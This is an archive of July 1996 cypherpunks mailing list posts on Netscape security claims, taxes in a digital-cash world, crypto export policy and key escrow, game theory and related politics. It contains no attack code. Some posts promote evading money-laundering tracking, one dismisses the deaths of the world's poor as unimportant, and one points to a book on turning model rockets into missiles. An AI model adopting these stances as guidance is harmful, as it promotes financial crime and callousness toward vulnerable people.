http://home.netscape.com/newsref/ref/netscape-security.html#test
and click on the link under the heading Testing the Secure Server link
"Here is a secure server you can visit.

Do an iptrace and analyse of the interaction between the server and their
browser version 3.05bgold and 3.05b, of which both reports that they are not
even running a secure version of the server there.

We decided to test further and found that the RSA secure server is only SSL 2 
and SSL 3 which is what Netscape seems to be touting to the resting of the 
world saying they have it NOW. Later, if not much later seems far more
realistic. 

I do not like being lied to, mislead or steam rolled by, how about
you?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 31 Jul 1996 05:49:10 +0800
To: David Kline <dkline@well.com>
Subject: Re: Dry Under the Waterfall
In-Reply-To: <Pine.SOL.3.91.960730085319.25477C-100000@well>
Message-ID: <31FE3BD8.5445@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


David Kline wrote:

> Well, change means pain, and we'll get to the millennium one way or
> another. But we can do it the hard way or the easy way. The hard way
> means severe social dislocation, possibly even threats to democracy. The
> easy way seems the smarter approach 

But there's absolutely no reason to believe it'll work.  I mean, heck;
people successful enough to become *legislators* are unlikely to use
on-line media.  

> no serious effort at reforming education and at skills retraining has 
> ever been undertaken

Have a nice life trying to reform American education.  We're stuck with
the dream system of 1840 right now, and people still seem to look back
to "the good old days".  There's no political capital in "let's make 
our educational system more sophisticated", but there's plenty of it
in "let's get back to the basics in our education system".

People generally learn to read because they want to, education system
or no.  A child or adult ready & willing (& without some physical
disability) can get going in a couple of weeks.  The drudgery of
early elementary school has little to do with it.

> and it seems a better use of our tax dollars  than most of the crap 
> it's spent on now.

Here's a novel idea: why not just refund our tax dollars instead of
spending them on a wacko boondogle like dropping a network appliance
into every home?

(What's the actual---like, *real*---penetration of Minitel?  I don't
care about how many French households have a terminal; how many French
people are real active users?  Can you be a content provider with
Minitel?)

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jul 1996 06:52:08 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
Message-ID: <v02120d2bae2400d13879@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:17 7/30/96, Igor Chudov @ home wrote:
[...]
>Another alternative that I see is property taxes and poll taxes,or
>taxes on some commodities such as oil. But incomes seem to be hard to
>track.

What you also will see is an increase in sales tax. You still got to buy
groceries locally.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 31 Jul 1996 03:50:07 +0800
To: source@iaccess.za
Subject: Re: Netscape Security Lies
In-Reply-To: <199607300939.CAA24753@toad.com>
Message-ID: <199607301624.MAA15114@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


source@iaccess.za writes:

: We have just tested Netscape's security page and it seems they are either lyi
: ng
: or have a major bug.
: 
: All you have to do to confirm this is to go to their page
: http://home.netscape.com/newsref/ref/netscape-security.html#test
: and click on the link under the heading Testing the Secure Server link
: "Here is a secure server you can visit.

It seems secure enough to me.  It won't even let me make a connection,
always saing that ``a network error occurred while Netscape was
receiving data''.  I am running the new non-export strength Netscape
beta for Linux and have my cookies file set to ReadOnly.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jul 1996 07:29:32 +0800
To: cypherpunks@toad.com
Subject: Re: TLAs on cypherpnks (was R
Message-ID: <199607301939.MAA08395@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 AM 7/30/96 -0500, pjn@nworks.com wrote:
> In> Is this the first confirmed report of TLA cypherpunk-monitoring?
> Might be the first reported, but many people probably thought it was...
> I did...

ABout N years ago, when you could still read all of Usenet if you 
really wanted, and when Usenet mostly was carried by telephone
rather than NNTP, there were a few places that got their newsfeeds
by weekly magtape.  One of them was Australia.  Another was the FBI.....
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jul 1996 07:27:13 +0800
To: alexf@iss.net
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607301939.MAA08382@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Now, would you mind doing a little translation (for the laymen), 
>since I didn't understand?

We did Fourier transforms in third--or-fourth semester calculus in college,
but then I _was_ an engineer; electrical engineers would go on to do
lots more of this stuff, since frequencies and waveforms are their territory.
Essentially, you can look at "most" continuous functions in normal time-space,
or you can represent them in a frequency space instead,
and you can reproduce the original function by transforming from
the frequency space back to the time space.  The "Lebesgue" bit
is a precise definition of "most".  

(For most of the math I did in college, "Lebesgue" was a phrase meaning 
"/* you are not expected to understand this */",
and it and Measure Theory got trotted out to clarify rigorously
when functions are well-behaved enough for the stuff we were learning to apply.
Most functions you use are Lebegue integrable, unless you use stuff like
"f(x) = 0 if x is rational and 1 if x is irrational".)

Discrete Fourier Transforms are a related analysis technique that work
on sets of numbers such as equally-spaced samples from a continuous function.
The Fast Fourier Transform is a particularly efficient way to do DFTs,
which was a breakthrough that made them practical to do on computers,
and Jim was reminding the previous poster that for the problem at hand,
determining the frequency spectrum of whatever-it-was, that DFTs aren't
what you need; you need the regular continuous Fourier transform.

At 01:04 PM 7/29/96 +0000, you wrote:
>> Jim Choate <ravage@einstein.ssz.com> writes:
>
>> You want a continuous Fourier transform, not a discrete one, to
>> determine the frequency spectrum of the waveform being sampled.
>> The FFT is simply an algorithm for computing the DFT without
>> redundant computation.  In general, any Lebesgue integrable
>> complex function will have a Fourier transform, even one with a
>> finite number of discontinuities. The reverse transform will
>> faithfully reproduce the function, modulo the usual caveats about
>> function spaces and sets of measure zero.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jul 1996 08:52:45 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
Message-ID: <199607301939.MAA08390@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


SUMMARY:   A: Quotation.  B,C,D: usual rehash   E: Interesting conclusions
A) At 06:17 AM 7/30/96 -0500, ichudov@algebra.com (Igor Chudov) wrote:
>The question is, how can the government TECHNICALLY collect taxes?
....
>Let's say, maybe this tax would work: every time someone verifies that
>a piece of digital cash is valid, s/he has to pay the government a little
>percentage of the amount. Since digital banks are easier to control than
>other participants of the market, this kind of tax legislation is easier to
enforce.
..
>Another alternative that I see is property taxes and poll taxes, or
>taxes on some commodities such as oil. But incomes seem to be hard to track.

B) Basically, you can either tax income, consumption, transactions, ownership,
and the right to do business.  Ownership of land and easily traced tangibles, 
like houses and cars, still works, but isn't a big enough source of revenue 
for current government appetites, and taxing consumption (i.e. purchase) 
of these items is also revenue-limited.  US-based corporations are regulated 
- by taxing profits, they're given an incentive to report all their consumption,
generating a recording stream that fingers employees, contractors, and other 
corporations, making their incomes more visible.  Similarly, business licensing 
raises the visibility of people who might otherwise engage in profitable
services
(typically in the name of protecting the consumer through quality control), 
and often creates transaction records such as building permits.

C) Taxing bank _transactions_ isn't realistic - it encourages people to use
offshore
banks, and it's a major change in the way US taxes work.  Even with
payee-and-payer-anonymous digicash, when the digicash gets stored in an account
for translation to treecash, the bank can tell which account, though they
can't tell when and from whom you got the digicash, and if they pay interest
they must report it,
so that tells the IRS your average balance, letting them play the
traditional game of 
"you received $X in your bank account, prove that it wasn't taxable income"
(again, unless you're banking offshore.)  

D) As long as you're buying physical stuff, it's generally either small-volume 
(e.g. handicrafts and artwork) or made by corporations that are relatively
traceable,
because they're forced to report their incomes, or else it's material that's
purely black-market anyway, like dope.  But today's economy is moving away from
manufacturing and mostly into services; the low-paid stuff like lawnmowing
and babysitting helps support poor people, but isn't a big revenue impact.
The interesting problems occur when both your source of income and most of 
your consumption are communication-based intangibles - consulting, electronic 
paperwork, writing software, writing entertainment, selling
electronically-delivered
wares, laundering money, laundering software, laundering entertainment,
buying software, buying entertainment, buying consulting for your business.
Since the services and payment can both be delivered invisibly, that _can_
let lots of people get under the radar.

E) I think the battleground for taxation and control over the digital
economy will be
fought in two or three areas.  One is wiretapping, of course, to protect us from
narco-porno-taxevaso-terrorists; attempting to control the key management
structure will be a big part of this, since it lets you trace the players
as well as the money.  (Even if they don't get your private keys,
and can only force registering of, say, snail-address along with public keys,
that gives them much of the game.)  A related push is censorship, probably
with mandatory authorship identification ostensibly to enforce content
labelling.

But the other big push will be for licensing of computer practitioners and
software -
there's been some attempt at this already, partly from the serious safety
folks and
partly from the state-level business-licensing meddlers, but I think we'll
see far
more of it as the government realizes that it's a big hook for retaining tax 
visibility.  Because the software business is extremely portable and
geography-independent, much of the tracking will be from the demand side.
Software for some reasonably large fraction of use may need to be
certified by either a licensed practitioner or a corporation that can be liable.
After all, we _need_ to protect the integrity of the National Information
Infrastructure to preserve American jobs and protect our kids! 

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Wed, 31 Jul 1996 09:22:08 +0800
To: "cypherpunks" <ceridwyn@wolfenet.com>
Subject: Re: fbi, crypto, and defcon
Message-ID: <199607302232.PAA12559@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Jul 96 08:42:26 -0800, ceridwyn@wolfenet.com wrote:


>making laws).  The question was rephrased: "How do you personally feel
>about exporting strong crypto", and again they refused to answer on the
>grounds that they were there as spokesmen for the FBI, but people could
>talk to them later and ask any questions they liked, and "the answers may
>surprise you".  Evidence that maybe some goons really do have a clue, but
					  ^^^^^
>are still too afraid to do anything about it... //cerridwyn//

This probably isn't the most accurate phrase.  Generally, goons wouldn't
even have said *that* much...


I'm really starting to think this is a confirmation of a corollary of the
Dilbert Priciple: incompetence rises to the top.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 13:32:50 +0800
To: cypherpunks@toad.com
Subject: "Filter"software for money laundering
Message-ID: <ae22c738030210040ad0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Apparently the Poles are seeking tools for controlling the economic
transactions of its citizen-units. Thanks to Bob for forwarding this to us.
I am copying Andrzej Adamski on my response.)

At 2:59 PM 7/29/96, Robert Hettinga wrote:
>--- begin forwarded text

>Date:         Mon, 29 Jul 1996 16:06:53 +-200
>Reply-To: Law & Policy of Computer Communications
>              <CYBERIA-L@LISTSERV.AOL.COM>
>Sender: Law & Policy of Computer Communications
>              <CYBERIA-L@LISTSERV.AOL.COM>
>From: Andrzej Adamski <aadamski@CC.UNI.TORUN.PL>
>Subject:      "Filter"software for money laundering
>Comments: cc: "comcri-l@man.torun.pl" <comcri-l@man.torun.pl>,
>          "lacc@suburbia.net" <lacc@suburbia.net>
>To: Multiple recipients of list CYBERIA-L <CYBERIA-L@LISTSERV.AOL.COM>
>
>Sorry for cross-posting this message:
>
>Dear All,
>
> Are you familiar with any
>     software or any listing of producers of software to be used in
>     tracking money-laundering?
>
>     If so, let me know.

Yes, the Cypherpunks mailing list (send a request as described below) has
software to defeat methods of tracking money-laundering. In particular,
anonymous remailers, unbreakable cryptography, offshore data havens,
digital cash, information markets, and a large body of thought about
methods to defeat attempts by Central States to control and track the
economic transactions of individuals and corporations.

I realize our Polish correspondent may be seeking tools to _assist_ the
Police of his country in stopping his countrymen from moving funds around
without the approval and control of the apparatchniks who control such
things in command economies, but I think he needs to know just how hopeless
the task really is.

The Polish state will crumble, though it may take a couple of generations.

--Tim May, Crypto Anarchist

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 13:30:58 +0800
To: cypherpunks@toad.com
Subject: Re: game theory
Message-ID: <ae22c9f204021004aec9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:42 AM 7/30/96, Wei Dai wrote:
>I agree with Tim that game theory is very interesting and a potentialy
>useful tool in cryptography.  However, game theory currently has a major
...
>I have not read any of Schelling's work, but the notion of Schelling
>points seems to be closely connected to that of equilibria in game theory.
>If this is the case, then I don't see how it can be usefully applied to
>the complex interactions of an entire society.  It is easy to say that
>current social conventions are an equilibrium in some game, but how much
>is this worth?  What we would like to know is what is the entire set of
>possible equilibria, why we are in one of them (instead of the others),
>and how changes in the game (such as introduction of strong crypto) change
>that set.  I find it unlikely that game theory will soon advance to such a
>state that it will give us the answers to these questions.
...
>P.S.  Now that I've reread Tim's original messages, I realize that maybe
>Schelling points are not really the equilibria of game theory.  If this is
>the case, Tim, can you please clarify its actual meaning?  (Perhaps by
>quoting a definition from Schelling's book?)

I certainly make no grandiose claims that any _single_ facet of reality is
guaranteed to be useful, as I'm sure Wei Dai would agree. I presented the
theory of Schelling points because I've found the notion to be interesting,
unifying, and helpful in my understanding of many phenomena. (Clearly,
there are dozens or even hundreds of such "core concepts.")

Schelling was addressing a different aspect of game theory than
conventional equilibria (as in payoffs, I presume to be Wei's emphasis).

The David Friedman paper I cited the URL for
(http://www.best.com/~ddfr/Academic/Property/Property.html) has a fuller
explanation of Schelling points than I can justify writing here. He writes:

"Such an outcome, chosen because of its uniqueness, is called a Schelling
point, after Thomas Schelling who originated the idea. It provides a
possible
solution to the problem of coordination without communication. As this
example shows, it is relevant both to situations where communication is
physically impossible and to situations where communication is impossible
because there is no way that either party can provide the other with a
reason
to believe that what he says is true."


My conjecture that game theory and cryptography have some natural and
fruitful points of intersection is of course just a conjecture. I have long
believed--though I cannot formally prove it--that many of the problems with
digital cash and related ideas are "made to converge" by consideration of
iterated games, e.g., reputations, expectations, expected payoffs, and so
forth. I believe we see this in the "real world," where economies actually
work in ways that the pure theory (absent game theory) would suggest
problems.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 31 Jul 1996 07:00:10 +0800
To: cypherpunks@toad.com
Subject: Re: New Anti-Terrorism Pact
Message-ID: <31FE4E68.184B@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the Reuters story:

> The ministers also vowed to prevent extremists from using the Internet
> computer network to plan attacks and spread bomb-making instructions. 

Yawn.



[ ... I guess they'll have to rough it and use the phone. ]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jul 1996 09:29:24 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <v02120d31ae241585e212@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 7/31/96, Timothy C. May wrote:

>This point has been raised by us many times. And, to be fair, this point is
>not lost on the NSA/Freeh/Denning/Gorelick crowd, I am sure. That is, they
>would not countenance the importation into the U.S. of "Iraq-GAKked" and
>"China-GAKked" programs, for example.
>
>So, what's the deal? The resolution of this quandary almost certainly lies
>in an "international agreement," along the lines of the various key escrow
>meetings which have been held (Karlsruhe in '93, Washington in '94, etc.).
>A "New World Order" solution, with complicated reciprocal agreements about
>whom the trusted key authorities might be, how nations could gain access,
>etc. (These relationships are too complicated for my brain to handle...how,
>for example, would one come to an agreement with Libya? What about Cuba,
>given that many of our nominal allies trade freely with Cuba and chafe when
>we try to get them to join our boycotts?)

I don't see a global agreement on GAK happening anytime soon. But that
doesn't mean that a less ambitious agreement can't be reached. Perhaps it
will come out of OECD, perhaps it will be limited to G-7. We will see an
agreement on GAK amongst the major players, with the exception of Japan.
After all, the players are faced with the same dilemma: how to best control
the behavior of their citizens.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 31 Jul 1996 08:28:53 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: Returned mail.No such addressee
Message-ID: <199607302036.NAA10469@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:58 PM 7/30/96 +0200, somebody signing a message as 
Remo Pini <rp@rpini.com> wrote:
> Actually the archives from ftp.dsi.unimi.it have moved to:
>               ftp://idea.sec.dsi.unimi.it/pub/
> It's a very large repository and to hell with ITAR, it's italian.

And it's got a set of mirrors for many of the other popular sites as well.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 31 Jul 1996 01:26:14 +0800
To: cypherpunks@toad.com
Subject: Reno and G8
Message-ID: <199607301359.NAA13344@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


AG Janet Reno is meeting today with G-8 ministers in Paris to discuss
anti-terrorism policies. Reports on those sessions from highly placed Euro
subscribers would be appreciated. 
 
 
If needed, faxes of articles may be sent to 212-799-4003, anonymity
assured. French, German or Spanish welcomed -- we've got translation
software to garble them in English.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 14:51:25 +0800
To: cypherpunks@toad.com
Subject: Re: e$: The Demographic "Transaction" (was Re: Schelling 	  Points...)
Message-ID: <ae22daac050210049d05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:36 AM 7/30/96, Arun Mehta wrote:

>Socialism as an economic philosophy is fairly discredited, and is
>on its way out without my expressions of outrage needed to help
>it along. Yet, the capitalist economy seems to be no better at
>dealing with extreme poverty.

Really? Extreme poverty seems to be its own reward.

So, I think market economies are dealing with the incompetent and/or the
lazy very well.

(This may sound harsh to many of you, but think about a world of seven
billion souls, many of them living at the margins of survival. Not much
more could be expected, no matter the economic system. In particular,
command economies have not been more effective. Think about it this way: in
100 years, who cares if a billion or so folks lived only an average of
38.37 years instead of 41.91 years?)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 31 Jul 1996 06:52:23 +0800
To: David Kline <dkline@well.com>
Subject: Re: Dry Under the Waterfall
Message-ID: <2.2.32.19960730180444.0086bcf8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 AM 7/30/96 -0700, David Kline wrote:

>A question though: What about the 3 million hard-working, reading, 
>middle-class folks who have been downsized into oblivion the last three 
>years alone? What about the tens of millions of readers who had the skills
>needed for the industrial age, but not for the information age?

I mean actual ability to read and write *meaningfully*.  Not the official
"literacy" handed out in thousands of local institutions designed to produce
mental retardation in this country.  It is a skill almost are capable of
(most had it in 1856 -- we know this because we can read the Lincoln-Douglas
debates), but monopoly government institutions can no more make genuine
literacy than they can make decent steel.

>Well, change means pain, and we'll get to the millennium one way or 
>another. But we can do it the hard way or the easy way. The hard way 
>means severe social dislocation, possibly even threats to democracy. The 
>easy way seems the smarter approach -- no serious effort at reforming 
>education and at skills retraining has ever been undertaken, and it seems 
>a better use of our tax dollars than most of the crap it's spent on now.

H.L. Mencken (always an optimist) said that a significant improvement in the
quality of American education could only be achieved if you dynamited all
the schools and shot all the teachers.

Whether that is true or not.  The governments have had the minds of our
children since 1870 or so.  If they haven't done a better job than this
perhaps it is time to retire them.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 31 Jul 1996 07:38:19 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
In-Reply-To: <199607301117.GAA06799@manifold.algebra.com>
Message-ID: <v03007808ae23f18249dc@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 AM -0400 7/30/96, Sandy Sandfort wrote:
> If I were the government, I'd tax realty as my primary or only
> source of income.  It *appears* "progressive" so it appeals to
> the lower class, but it is passed along to everyone in the form
> of higher commodity prices and rents.  Realty can't be picked up
> and moved to another jurisdiction like personal property or
> people, so it is easier to hold as a tax hostage by government.

Sometimes, in my wilder moments, I think about it this way: Agriculture
created cities, where the "government", actually large landowners, relied
on implicitly forcible payments-in-kind of agricultural produce.
Industrialism (Maybe. Maybe printing did.) created nation states, which
rely on forcibly obtained taxes on cash-flow and financial assets. Maybe,
in a financial cryptography -enabled geodesic economy, cashflow and
financial asset taxation become impossible as a revenue source for anything
but the propigation and/or regulation (probably private) of cashflows and
financial assets themselves ;-).

The phrase "Government services" becomes exposed for the oxymoron that it
really is under this scenario. There'll be no way to compel payment for
these "services", so they'll be forced to prove their usefulness in a
market of some kind. They'll have to earn their money the old fashioned
way.

I expect that large economic entities may exist, the way cities and
nation-states do, but they won't be geographic in nature, because location
ceases to be as economically important as it is in agriculturalism, where
land is the source of all wealth, or as it is in industrialism, where
actual physical positions in distribution and information heirarchies are
so important. (The three laws of retail, and all that...)  It's even hard
for me to see large permanent entities as salient features of such an
economy. That is, each entity will be more like an ad-hoc partnership of
other smaller entities, which goes away after its specific financial
purpose has been completed. We're experimenting with those "virtual"
organizations now, and the word "syndicate" will probably reemerge as the
dominant way of doing larger business projects. The financial and
entertainment markets work this way a lot, and, even though large
corporations exist in those markets, lately there's been a proliferation of
smaller and smaller firms as information technology enables their creation.

Permanence is a function of physical reality, and information, because it's
not physical, is not permanent. It is always in the process of becoming
something else.

So, real estate taxes may be the only thing left, but they might be used
for really trivial stuff, like very local roads, infrastructure (dark fiber
maintenance? :-)), etc., and not much else. Kind of like local irragation
committees in third world countries (or New Mexico ;-)) devolved from the
water-monopoly "states" of places like ancient Mesopotamia, Egypt or China.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jul 1996 08:34:39 +0800
To: cypherpunks@toad.com
Subject: RE: Let's Say "No!" to Single, World Versions of Software
Message-ID: <199607302110.OAA05638@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone asked a few days ago what US companies are doing to oppose ITAR. 
many of them are taking public positions on the ProCODE bill. Another of
the things they are doing is deploying strong crypto domestically.  (Arun
Mehta and Tim May have detailed the mechanisms why this domestic deployment
will have world-wide impact.)

Here is a start at a list of such companies:

Community ConneXion - Too much to mention, Thanks Sameer
IBM - The Anarchistic Key Authorization system (from U of Texas), 
   see 6th Usenix Security Symposium proceedings
Netscape - SSL
PGP Inc - 'nuff said
Sun Microsystems - SKIP implementation, PGP v3 implementation

Please add to the list.  We should recognize and remember our friends.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 31 Jul 1996 06:40:55 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorists are adult
Message-ID: <TCPSMTP.16.7.30.14.13.38.2645935021.657726@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> An interesting theory, which my experience supports.

 In> I started with model rocketry, and then discovered that it was more
 In> fun to blow the rockets up, rather than have them come back to earth.
 In> (You don't have to sweat the construction details as much, either)
 In> About the time I turned 21, I lost interest in making exploding
 In> rockets and blowing craters in sand dumes. 

 You may be interested i knowing that Palladin Press sells a book on
 converting model rockets into SAM and SSM's...


 P.J.
 pjn@nworks.com



... I am Jesus of Borg.  Blessed are they who are assimilated.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 31 Jul 1996 08:52:33 +0800
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae22b81940ed@[192.187.162.15]>
Message-ID: <v03007801ae242b4f7350@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Preface: Having weathered the storm of personal attacks, I've concluded that
most of what is on this list _right now_ is of insufficient interest to what
I'm currently working on to continue, so I've unsubscribed (there's too much
traffic to let it be). I will see the occasional posts copied to me and
respond, Posts allegedly from me, if not signed, are forgeries until I post
a signed notice that I have rejoined the list.

Thanks for listening;
David

At 12:37 PM -0700 7/30/96, Ray Arachelian wrote:
>On Mon, 29 Jul 1996, David Sternlight wrote:
>
>> Let those who passed basic English use the skills they were taught. Freeh
>> said, and I repeated, that the system wasn't designed to prevent
determined
>> criminals from using robust crypto.
>
>Yes, and the implication is this: the system was designed to prevent law
>abiding folk from using robust crypto, and to allow the TLA's and LEA's
>to snoop on them.

Close. For "designed to prevent" read "not make available from the US", and
for "folk" read "foreigners".

There's no earthly reason the US should assist foreigners in thwarting US
intelligence efforts.

As readers know, I am opposed to mandatory domestic key escrow.

David

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMf58VkwgH+NYrQ81AQHyKQP+LLt0G6HQ3D7S27QqCntxSi2F7/UGHJXj
JXZLrLaw5/7gWa/vC/caO34ZX+MNhH6r3gjC61iYTlyKxz2Y14CIM1bJQJgfKfiF
hpTCZkbQRcq6cuRkpWibeoGWHjh/m0uvexgZlNUrzxX4cwibakKZZvyWKdTqRHTH
c2jX1YTP0/s=
=6vhi
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 31 Jul 1996 06:41:38 +0800
To: cypherpunks@toad.com
Subject: Smart cards "a giant leap backwards" - Canadian Privacy Commissioner
Message-ID: <9607301423.ZM21073@glacius.tor.aw.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Very little that might be new or enlightening to the world; attendees
of CFP '96 will remember [fuzzily, in my case] the closest thing to
Bruce's counterpart in the states admitting that the USA doesn't actually
have much of a counterpart to the privacy commissioner.

http://www.thestar.com/thestar/editorial/news/960730A01_NA-PRIVACY30.html

[This is Canada's commissioner, not Ontario's.]

frodo

--
Richard Martin                                   [not speaking for a|w]
rmartin@aw.sgi.com                   http://reality.sgi.com/rmartin_aw/
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 08:44:20 +0800
To: Marshall Clow <cypherpunks@toad.com
Subject: Re: Denning vs. Gilmore
Message-ID: <199607302145.OAA24372@mail.pacifier.com>
MIME-Version: 1.0
